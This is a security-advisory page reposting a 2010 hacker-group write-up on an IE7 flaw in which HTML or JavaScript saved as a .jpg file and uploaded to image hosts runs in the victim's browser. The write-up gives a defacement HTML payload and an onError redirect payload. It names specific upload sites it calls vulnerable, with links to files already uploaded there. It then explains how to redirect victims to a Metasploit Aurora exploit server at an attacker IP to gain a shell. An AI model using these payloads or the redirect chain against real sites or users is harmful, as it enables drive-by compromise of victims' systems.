|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 7079 CVE : CVE-2010-0249 CWE : CWE-327 CWE : CWE-399 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : Yes Exploit Available : Yes Credit : 7H3_BoSs Published : 06.03.2010
Advisory Content : ############################################# # # # [+] IE 7 Java & Html Codes INJECTION # [+] Discovered By 7H3 BoSs # # ############################################# # # # # [] Founder : [ 7H3 BoSs ] # [] Members : [ ReZa , sub.z3l2o , Wishe ] # [] Team : [ KatRina iRanian Security Team ] # [] Greetz : [ ReZa , sub.z3l2o , Wishe , NEO ] # # # ########################################################################### #################################### # # # [+] html Exploit Example : # # Open A text document and insert a html code in that like this : # # <html> # <head> # <title>Hacked By KatRina Iranian Hackers</title> # </head> # <body bgcolor=black text=White> # <center><h2>Hacked By KatRina Iranian Hackers</h2> # <img src='http://www.gciran.com/services/graphic/star.jpg'> # <br> # <h2>We Are : </h2> # <bR> # <h2>ReZa , SuB zErO , Wishe , 7H3 BoSs</h2> # </center></body> # </html> # # then save it as jpg format # ########################################################################### #################################### # # [+] java Script Exploit Example : # # Open A text document and insert a java script code in that like this : # # # <img src="" onError="document.location='http://google.com'"> # # then save it as jpg format # ################################################# # # [+] Introduction : # # then save html code as jpg like KatRina.jpg # or insert java script codes and save it again as jpg file # then upload image in vulnerable images upload centers # remeber 30% of upload centers are vulnerable but not all # # ################################################## # # # [+] Html INJECTION : # # I create a text document and inserted html code in that then save it as jpg # My file name is Katrina.jpg thus i uploaded it in a vulnerable upload centers # # in this image upload center : http://datairan.gigfa.com/index.php # Uploaded file : http://datairan.gigfa.com/files/axc0goer2hor9499need.jpg # note : open in IE7 and you can see html code injected # # another upload center : http://upload.mamazy.net # bypassed : http://upload.mamazy.net/images/oncljs8ef6qng40kily.jpg # # another upload center : http://up.iranblog.com/ # bypassed : http://up.iranblog.com/37261/1267616595.jpg # # ################################################# # # [+] Java Script INJECTION : # # # i Create a text document then inserted Java Script Code in that and save it as jpg # my file name is KatRina.jpg and i inserted : # # <img src="" onError="document.location='http://google.com'"> # # and save it as jpg and upload it in a vulnerable upload centers and victim with IE7 # will redirect to google.com !!! # Example : http://up.iranblog.com/37261/1267642065.jpg # open with IE7 and you will be redirect to http://google.com # note this is example and you can do many things with this # for instant you can use "Aurora" IE Exploit in metasploit and exploit it as http://yourIP:8080/ # and do it like this : # # open a text document and insert : # # <img src="" onError="document.location='http://yourIP:8080'"> # # then save as jpg and upload it in a vulnerable image hosting and give uploaded url to victim # and he or his will redirect to your exploit url and you can gain shell of victim system !!! # ########################################################################### #################################### # # # [+] some vulnerable upload center : http://up.iranblog.com/ # http://datairan.gigfa.com/index.php # http://fuc.ir/ # http://upload.mamazy.net # # ################################################# # # # [+] Note : # # you can do many things with this method and use many html or java scripts codes or both ! # # # ENJOY ! # ################################################## # # # # [+] Contact : # i.The.l3oSs.i@Gmail.Com # # # ################################################### References : http://www.us-cert.gov/cas/techalerts/TA10-055A.html
http://www.kb.cert.org/vuls/id/492515
http://xforce.iss.net/xforce/xfdb/55642
http://www.vupen.com/english/advisories/2010/0135
http://www.securityfocus.com/bid/37815
http://www.microsoft.com/technet/security/Bulletin/MS10-002.mspx
http://www.microsoft.com/technet/security/advisory/979352.mspx
http://www.exploit-db.com/exploits/11167
http://support.microsoft.com/kb/979352
http://securitytracker.com/id?1023462
http://osvdb.org/61697
http://news.cnet.com/8301-27080_3-10435232-245.html
http://blogs.technet.com/msrc/archive/2010/01/14/security-advisory-979352.aspx  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |